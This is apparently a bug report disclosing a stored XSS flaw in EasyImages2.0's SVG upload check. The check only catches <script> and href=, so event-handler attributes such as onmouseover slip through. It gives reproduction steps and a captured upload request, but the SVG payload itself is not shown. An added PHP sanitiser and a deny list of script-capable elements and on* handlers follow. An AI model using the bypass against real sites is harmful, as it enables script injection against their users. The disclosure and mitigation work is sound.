Describe the bug
In app/upload.php, the code at line 94 that checks the content of .svg images uses a regular expression that is not strict enough: it only checks for the <script> tag and the href= attribute and does not check other XSS vectors, as shown in the figure below:
It can be bypassed using event handlers, such as the onmouseover event, onclick and other events. The event handler case is used as the example below.
Proof of vulnerability
1. Visit the frontend at http://easyimages2.0.com:84 and click "select file". Any .svg will do, for example upload xss.svg; open it in Notepad and edit its content to 111. Capture the request during the upload and replace the 111 with the payload below:
(image: SVG XSS)
2. Finally, access the returned path to verify the vulnerability.
Full payload demonstration:
POST /app/upload.php HTTP/1.1
Host: easyimages2.0.com:84
Content-Length: 652
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAInb7EYA1l1aG22F
Accept: */*
Origin: http://easyimages2.0.com:84
Referer: http://easyimages2.0.com:84/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zu;q=0.5
Cookie: Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1762869351; HMACCOUNT=E84C5FB68F8B5CBC; filemanager=s0uekupm8lehqapk7v5msu2sib; PHPSESSID=6e12mgfvc21aunj5i4buvi3lsk; Hm_lpvt_c790ac2bdc2f385757ecd0183206108d=1762871216
Connection: keep-alive
------WebKitFormBoundaryAInb7EYA1l1aG22F
Content-Disposition: form-data; name="name"
xss.svg
------WebKitFormBoundaryAInb7EYA1l1aG22F
Content-Disposition: form-data; name="uuid"
o_1j9pl4k1gjkge6ljmd51g9f0i
------WebKitFormBoundaryAInb7EYA1l1aG22F
Content-Disposition: form-data; name="sign"
1762871215
------WebKitFormBoundaryAInb7EYA1l1aG22F
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml
The resulting screenshot is shown below:
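As an added example (not code from the EasyImages2.0 project or from the reporter), the following PHP shows a stricter content check that a maintainer could apply in place of the regex described above. Instead of matching two strings, it parses the upload as XML with network access disabled and rejects script-capable elements, every on* event-handler attribute (onload, onclick, onmouseover and so on), and any href or xlink:href that is not an in-document fragment reference. The function and constant names, the PHP 8 requirement, and the sample inputs are assumptions of this example.

```php
<?php
// Added example, not the project's own code: a stricter check for uploaded
// SVG content than a regex that only looks for <script> and href=.
// The SVG is parsed as XML with network access disabled and the whole
// element tree is walked. Requires PHP 8 (str_starts_with).

// Elements that can run script, embed foreign content, set attributes
// at runtime or reference content outside the document. Assumed list.
const SVG_DENIED_ELEMENTS = [
    'script', 'foreignobject', 'iframe', 'embed', 'object', 'use',
    'set', 'animate', 'animatetransform', 'animatemotion',
];

// Returns a reason string if the SVG must be rejected, or null if it
// passed every check.
function svg_reject_reason(string $svg): ?string
{
    if (trim($svg) === '') {
        return 'empty file';
    }
    // A DOCTYPE allows entity declarations (entity expansion, XXE); refuse it.
    if (preg_match('/<!DOCTYPE/i', $svg)) {
        return 'DOCTYPE not allowed';
    }

    $prev = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // LIBXML_NONET: never fetch external resources while parsing.
    // LIBXML_NOENT is deliberately NOT set, since it would substitute entities.
    $ok = $doc->loadXML($svg, LIBXML_NONET | LIBXML_NOWARNING | LIBXML_NOERROR);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if ($ok === false || $doc->documentElement === null) {
        return 'not well-formed XML';
    }
    if (strtolower($doc->documentElement->localName) !== 'svg') {
        return 'root element is not <svg>';
    }

    $xpath = new DOMXPath($doc);
    // Processing instructions (e.g. xml-stylesheet) can pull in external content.
    if ($xpath->query('//processing-instruction()')->length > 0) {
        return 'processing instruction not allowed';
    }

    // Wildcard matches elements in any namespace, including the SVG default namespace.
    foreach ($xpath->query('//*') as $el) {
        $name = strtolower($el->localName);
        if (in_array($name, SVG_DENIED_ELEMENTS, true)) {
            return "element <$name> not allowed";
        }
        foreach ($el->attributes as $attr) {
            $aname = strtolower($attr->localName);
            // Every event-handler attribute, whatever the event name.
            if (str_starts_with($aname, 'on')) {
                return "event handler attribute $aname not allowed";
            }
            // href / xlink:href may only point inside the document (fragment).
            // localName is 'href' for both the plain and the xlink-prefixed form.
            if ($aname === 'href') {
                // Drop whitespace and control characters that browsers ignore
                // before the scheme, so they cannot hide a scheme prefix.
                $value = preg_replace('/[\s\x00-\x1f]+/', '', $attr->value);
                if ($value !== '' && $value[0] !== '#') {
                    return 'href must be an in-document fragment reference';
                }
            }
        }
    }
    return null;
}

// Constructed sample inputs for demonstration (not taken from the report).
$clean   = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>';
$handler = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5" onclick="x()"/></svg>';
foreach ([$clean, $handler] as $sample) {
    $reason = svg_reject_reason($sample);
    echo $reason === null ? "accepted\n" : "rejected: $reason\n";
}
```

The check is a deny list on a parsed tree rather than a regex on raw bytes, so attribute names cannot be hidden behind encoding tricks that a regex would miss, but it still only covers the vectors it names; CSS in style attributes and elements, for instance, is not inspected. The stronger mitigation for an image host is to not render user-supplied SVG inline at all: serve it with Content-Disposition: attachment or under a Content-Security-Policy with the sandbox directive, or rasterize it to PNG on upload, so that any script that does survive filtering never runs in the application's origin.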